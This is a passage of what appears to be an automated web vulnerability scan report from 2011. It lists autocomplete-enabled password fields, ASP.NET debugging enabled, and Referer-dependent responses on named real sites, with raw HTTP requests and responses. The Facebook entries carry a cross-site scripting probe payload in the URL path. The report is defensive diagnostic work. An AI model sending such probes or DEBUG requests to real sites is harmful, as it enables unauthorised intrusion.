12.93. http://www.marketwatch.com/News/Story/Story.aspx

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.marketwatch.com
Path:   /News/Story/Story.aspx

Issue detail

The page contains a form with the following action URL:
  • https://secure.marketwatch.com/user/account/logon
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /News/Story/Story.aspx HTTP/1.1
Host: www.marketwatch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: mw5_ads=seen=16; domain=.marketwatch.com; expires=Fri, 06-May-2011 04:59:59 GMT; path=/
X-Powered-By: ASP.NET
X-MACHINE: sbkdedtwebp01
Date: Thu, 05 May 2011 10:58:41 GMT
Content-Length: 50800

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="htt
...[SNIP]...
</p><form method="post" action="https://secure.marketwatch.com/user/account/logon">
   <div>
...[SNIP]...
<br/>
           <input type="password" name="password" value="" class="text password"/>
       </p>
...[SNIP]...

12.94. http://www.marketwatch.com/News/Story/Story.aspx

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.marketwatch.com
Path:   /News/Story/Story.aspx

Issue detail

The page contains a form with the following action URL:
  • https://secure.marketwatch.com/user/account/logon
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /News/Story/Story.aspx HTTP/1.1
Host: www.marketwatch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: mw5_ads=seen=16; domain=.marketwatch.com; expires=Fri, 06-May-2011 04:59:59 GMT; path=/
X-Powered-By: ASP.NET
X-MACHINE: sbkdedtwebp01
Date: Thu, 05 May 2011 10:58:41 GMT
Content-Length: 50800

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="htt
...[SNIP]...
</p><form method="post" action="https://secure.marketwatch.com/user/account/logon">
   <div>
...[SNIP]...
<br/>
           <input type="password" name="password" value="" class="text password"/>
       </p>
...[SNIP]...

12.95. http://www.marketwatch.com/News/Story/Story.aspx

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.marketwatch.com
Path:   /News/Story/Story.aspx

Issue detail

The page contains a form with the following action URL:
  • https://secure.marketwatch.com/user/account/logon
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /News/Story/Story.aspx HTTP/1.1
Host: www.marketwatch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: mw5_ads=seen=16; domain=.marketwatch.com; expires=Fri, 06-May-2011 04:59:59 GMT; path=/
X-Powered-By: ASP.NET
X-MACHINE: sbkdedtwebp01
Date: Thu, 05 May 2011 10:58:41 GMT
Content-Length: 50800

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="htt
...[SNIP]...
</a><form method="post" action="https://secure.marketwatch.com/user/account/logon">
   <div>
...[SNIP]...
<br/>
           <input type="password" name="password" value="" class="text password"/>
       </p>
...[SNIP]...

12.96. http://www.mmafighting.com/2011/05/03/sources-fedor-hendo-fight-could-be-announced-within-24-72-hours/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.mmafighting.com
Path:   /2011/05/03/sources-fedor-hendo-fight-could-be-announced-within-24-72-hours/

Issue detail

The page contains a form with the following action URL:
  • http://www.mmafighting.com/2011/05/03/sources-fedor-hendo-fight-could-be-announced-within-24-72-hours/
The form contains the following password field with autocomplete enabled:
  • AuthorPassword

Request

GET /2011/05/03/sources-fedor-hendo-fight-could-be-announced-within-24-72-hours/ HTTP/1.1
Host: www.mmafighting.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; s_pers=%20s_getnr%3D1304575044556-New%7C1367647044556%3B%20s_nrgvo%3DNew%7C1367647044557%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; comment_by_existing=deleted;

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:58:41 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: comment_by_existing=deleted; expires=Wed, 05-May-2010 10:58:41 GMT; path=/
Keep-Alive: timeout=5, max=999999
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 85678

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
</h3>


<form action="#comments" id="commentform" name="commentform" method="post" onsubmit="return inputValidation();">
   <div id="cmttabs">
...[SNIP]...
<br />
       <input id="C_AuthorPass" type="password" class="formtext" name="AuthorPassword" value=""/></label>
...[SNIP]...

12.97. http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.mmafighting.com
Path:   /2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/

Issue detail

The page contains a form with the following action URL:
  • http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/?icid=maing-grid7%7Cmain5%7Cdl4%7Csec3_lnk1%7C60545
The form contains the following password field with autocomplete enabled:
  • AuthorPassword

Request

GET /2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/?icid=maing-grid7%7Cmain5%7Cdl4%7Csec3_lnk1%7C60545 HTTP/1.1
Host: www.mmafighting.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:57:18 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; expires=Thu, 05-May-2011 01:57:18 GMT; path=/
Set-Cookie: comment_by_existing=deleted; expires=Wed, 05-May-2010 00:57:17 GMT; path=/
Content-Type: text/html
Content-Length: 63415

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
</h3>


<form action="#comments" id="commentform" name="commentform" method="post" onsubmit="return inputValidation();">
   <div id="cmttabs">
...[SNIP]...
<br />
       <input id="C_AuthorPass" type="password" class="formtext" name="AuthorPassword" value=""/></label>
...[SNIP]...

12.98. http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.mmafighting.com
Path:   /2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/

Issue detail

The page contains a form with the following action URL:
  • http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/
The form contains the following password field with autocomplete enabled:
  • AuthorPassword

Request

GET /2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/ HTTP/1.1
Host: www.mmafighting.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; s_pers=%20s_getnr%3D1304575044556-New%7C1367647044556%3B%20s_nrgvo%3DNew%7C1367647044557%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; comment_by_existing=deleted;

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:58:42 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: comment_by_existing=deleted; expires=Wed, 05-May-2010 10:58:41 GMT; path=/
Keep-Alive: timeout=5, max=999990
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 83656

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
</h3>


<form action="#comments" id="commentform" name="commentform" method="post" onsubmit="return inputValidation();">
   <div id="cmttabs">
...[SNIP]...
<br />
       <input id="C_AuthorPass" type="password" class="formtext" name="AuthorPassword" value=""/></label>
...[SNIP]...

13. ASP.NET debugging enabled
There are 2 instances of this issue:

Issue background

ASP.NET allows remote debugging of web applications, if configured to do so. By default, debugging is subject to access control and requires platform-level authentication.

If an attacker can successfully start a remote debugging session, this is likely to disclose sensitive information about the web application and supporting infrastructure which may be valuable in formulating targeted attacks against the system.

Issue remediation

To disable debugging, open the Web.config file for the application, and find the <compilation> element within the <system.web> section. Set the debug attribute to "false". Note that it is also possible to enable debugging for all applications within the Machine.config file. You should also confirm that the debug attribute in the <compilation> element has not been set to "true" within the Machine.config file.

It is strongly recommended that you refer to your platform's documentation relating to this issue, and do not rely solely on the above remediation.



13.1. http://www.eyewonderlabs.com/Default.aspx

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.eyewonderlabs.com
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.eyewonderlabs.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Thu, 05 May 2011 10:56:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

13.2. http://www.pageflakes.com/Default.aspx

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.pageflakes.com
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.pageflakes.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Thu, 05 May 2011 11:16:01 GMT
Server: Microsoft-IIS/6.0
From: web11
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

14. Referer-dependent response
There are 13 instances of this issue:

Issue description

The application's responses appear to depend systematically on the presence or absence of the Referer header in requests. This behaviour does not necessarily constitute a security vulnerability, and you should investigate the nature of and reason for the differential responses to determine whether a vulnerability is present.

Common explanations for Referer-dependent responses include:
  • Referer-based access controls, where the application assumes that if you have arrived from one privileged location then you are authorised to access another privileged location. These controls can be trivially defeated by supplying an accepted Referer header in requests for the vulnerable function.
  • Attempts to prevent cross-site request forgery attacks by verifying that requests to perform privileged actions originated from within the application itself and not from some external location. Such defences are not robust - methods have existed through which an attacker can forge or mask the Referer header contained within a target user's requests, by leveraging client-side technologies such as Flash and other techniques.
  • Delivery of Referer-tailored content, such as welcome messages to visitors from specific domains, search-engine optimisation (SEO) techniques, and other ways of tailoring the user's experience. Such behaviours often have no security impact; however, unsafe processing of the Referer header may introduce vulnerabilities such as SQL injection and cross-site scripting. If parts of the document (such as META keywords) are updated based on search engine queries contained in the Referer header, then the application may be vulnerable to persistent code injection attacks, in which search terms are manipulated to cause malicious content to appear in responses served to other application users.

Issue remediation

The Referer header is not a robust foundation on which to build any security measures, such as access controls or defences against cross-site request forgery. Any such measures should be replaced with more secure alternatives that are not vulnerable to Referer spoofing.

If the contents of responses are updated based on Referer data, then the same defences against malicious input should be employed here as for any other kind of user-supplied data.



14.1. http://www.facebook.com/10000082482078341583%3Cimg%20src=a%20onerror=alert(1)%3Eab0e5e0e0bd

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /10000082482078341583%3Cimg%20src=a%20onerror=alert(1)%3Eab0e5e0e0bd

Request 1

GET /10000082482078341583%3Cimg%20src=a%20onerror=alert(1)%3Eab0e5e0e0bd HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://burp/show/11
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response 1

HTTP/1.1 404 Not Found
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Set-Cookie: lsd=hrTlo; path=/; domain=.facebook.com
Set-Cookie: reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.40.55
X-Cnection: close
Date: Thu, 05 May 2011 11:29:43 GMT
Content-Length: 11493

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=" no_js">
<head>
<meta http-equiv="Content-type" content="text/html; charset=utf-8" />
<meta http-equiv="Content-language" content="en" />
<script type="text/javascript">
//<![CDATA[
CavalryLogger=false;window._script_path = "\/4oh4.php";window._EagleEyeSeed="mR5p";
//]]>
</script><noscript> <meta http-equiv=refresh content="0; URL=/10000082482078341583%3Cimg%20src=a%20onerror=alert(1)%3Eab0e5e0e0bd?_fb_noscript=1" /> </noscript>

<meta name="robots" content="noodp,noydir" />
<meta name="description" content=" Facebook is a social utility that connects people with friends and others who work, study and live around them. People use Facebook to keep up with friends, upload an unlimited number of photos, post links and videos, and learn more about the people they meet." />
<link rel="alternate" media="handheld" href="http://www.facebook.com/10000082482078341583%3Cimg%20src=a%20onerror=alert(1)%3Eab0e5e0e0bd" />
<title>Page Not Found | Facebook</title><noscript><meta http-equiv="X-Frame-Options" content="deny" /></noscript>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yD/r/rZiaNe7iEDZ.css" />
<link type="text/css
...[SNIP]...

Request 2

GET /10000082482078341583%3Cimg%20src=a%20onerror=alert(1)%3Eab0e5e0e0bd HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response 2

HTTP/1.1 404 Not Found
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Set-Cookie: lsd=mTzzT; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.97.25
X-Cnection: close
Date: Thu, 05 May 2011 11:29:58 GMT
Content-Length: 11447

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=" no_js">
<head>
<meta http-equiv="Content-type" content="text/html; charset=utf-8" />
<meta http-equiv="Content-language" content="en" />
<script type="text/javascript">
//<![CDATA[
CavalryLogger=false;window._script_path = "\/4oh4.php";window._EagleEyeSeed="5zvb";
//]]>
</script><noscript> <meta http-equiv=refresh content="0; URL=/10000082482078341583%3Cimg%20src=a%20onerror=alert(1)%3Eab0e5e0e0bd?_fb_noscript=1" /> </noscript>

<meta name="robots" content="noodp,noydir" />
<meta name="description" content=" Facebook is a social utility that connects people with friends and others who work, study and live around them. People use Facebook to keep up with friends, upload an unlimited number of photos, post links and videos, and learn more about the people they meet." />
<link rel="alternate" media="handheld" href="http://www.facebook.com/10000082482078341583%3Cimg%20src=a%20onerror=alert(1)%3Eab0e5e0e0bd" />
<title>Page Not Found | Facebook</title><noscript><meta http-equiv="X-Frame-Options" content="deny" /></noscript>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yD/r/rZiaNe7iEDZ.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yQ/r/3GUx1LLG0cl.css"
...[SNIP]...

14.2. http://www.facebook.com/1242845259e76bc%3Cimg%20src=a%20onerror=alert(1)%3Eb0233c9330b

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /1242845259e76bc%3Cimg%20src=a%20onerror=alert(1)%3Eb0233c9330b

Request 1

GET /1242845259e76bc%3Cimg%20src=a%20onerror=alert(1)%3Eb0233c9330b HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://burp/show/12
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; datr=ituyTcnawc6q7VcE0gibPCo2; act=1304613672018%2F1; L=2; reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Fhelp%2Fcontact.php%3Fshow_form%3Dcannot_identify%26flow%3Dpw_reset; wd=1022x1007

Response 1

HTTP/1.1 404 Not Found
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Set-Cookie: reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F12; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F1242845259e76bc%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eb0233c9330b; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F1242845259e76bc%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eb0233c9330b; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.43.102.67
X-Cnection: close
Date: Thu, 05 May 2011 11:56:26 GMT
Content-Length: 11478

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=" no_js">
<head>
<meta http-equiv="Content-type" content="text/html; charset=utf-8" />
<meta http-equiv="Content-language" content="en" />
<script type="text/javascript">
//<![CDATA[
CavalryLogger=false;window._script_path = "\/4oh4.php";window._EagleEyeSeed="r0x3";
//]]>
</script><noscript> <meta http-equiv=refresh content="0; URL=/1242845259e76bc%3Cimg%20src=a%20onerror=alert(1)%3Eb0233c9330b?_fb_noscript=1" /> </noscript>

<meta name="robots" content="noodp,noydir" />
<meta name="description" content=" Facebook is a social utility that connects people with friends and others who work, study and live around them. People use Facebook to keep up with friends, upload an unlimited number of photos, post links and videos, and learn more about the people they meet." />
<link rel="alternate" media="handheld" href="http://www.facebook.com/1242845259e76bc%3Cimg%20src=a%20onerror=alert(1)%3Eb0233c9330b" />
<title>Page Not Found | Facebook</title><noscript><meta http-equiv="X-Frame-Options" content="deny" /></noscript>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yD/r/rZiaNe7iEDZ.c
...[SNIP]...

Request 2

GET /1242845259e76bc%3Cimg%20src=a%20onerror=alert(1)%3Eb0233c9330b HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; datr=ituyTcnawc6q7VcE0gibPCo2; act=1304613672018%2F1; L=2; reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Fhelp%2Fcontact.php%3Fshow_form%3Dcannot_identify%26flow%3Dpw_reset; wd=1022x1007

Response 2

HTTP/1.1 404 Not Found
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F1242845259e76bc%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eb0233c9330b; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.191.67
X-Cnection: close
Date: Thu, 05 May 2011 11:57:33 GMT
Content-Length: 11432

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=" no_js">
<head>
<meta http-equiv="Content-type" content="text/html; charset=utf-8" />
<meta http-equiv="Content-language" content="en" />
<script type="text/javascript">
//<![CDATA[
CavalryLogger=false;window._script_path = "\/4oh4.php";window._EagleEyeSeed="5Qfi";
//]]>
</script><noscript> <meta http-equiv=refresh content="0; URL=/1242845259e76bc%3Cimg%20src=a%20onerror=alert(1)%3Eb0233c9330b?_fb_noscript=1" /> </noscript>

<meta name="robots" content="noodp,noydir" />
<meta name="description" content=" Facebook is a social utility that connects people with friends and others who work, study and live around them. People use Facebook to keep up with friends, upload an unlimited number of photos, post links and videos, and learn more about the people they meet." />
<link rel="alternate" media="handheld" href="http://www.facebook.com/1242845259e76bc%3Cimg%20src=a%20onerror=alert(1)%3Eb0233c9330b" />
<title>Page Not Found | Facebook</title><noscript><meta http-equiv="X-Frame-Options" content="deny" /></noscript>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yD/r/rZiaNe7iEDZ.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yQ/r/3GUx1LLG0cl.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yQ/r/9qdm_pQmTM3.css" />
<link type="te
...[SNIP]...

14.3. http://www.facebook.com/login.php

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /login.php

Request 1

GET /login.php HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/mobile/?ref=pf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fmobile%2F%3Fref%3Dpf; act=1304613664644%2F2; next=http%3A%2F%2Fwww.facebook.com%2Fmobile%2F%3Fsettings; next_path=%2Fmobile%2F%3Fsettings

Response 1

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; expires=Sat, 04-May-2013 11:43:56 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: next=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: next_path=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Flogin.php; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.37.19.117
X-Cnection: close
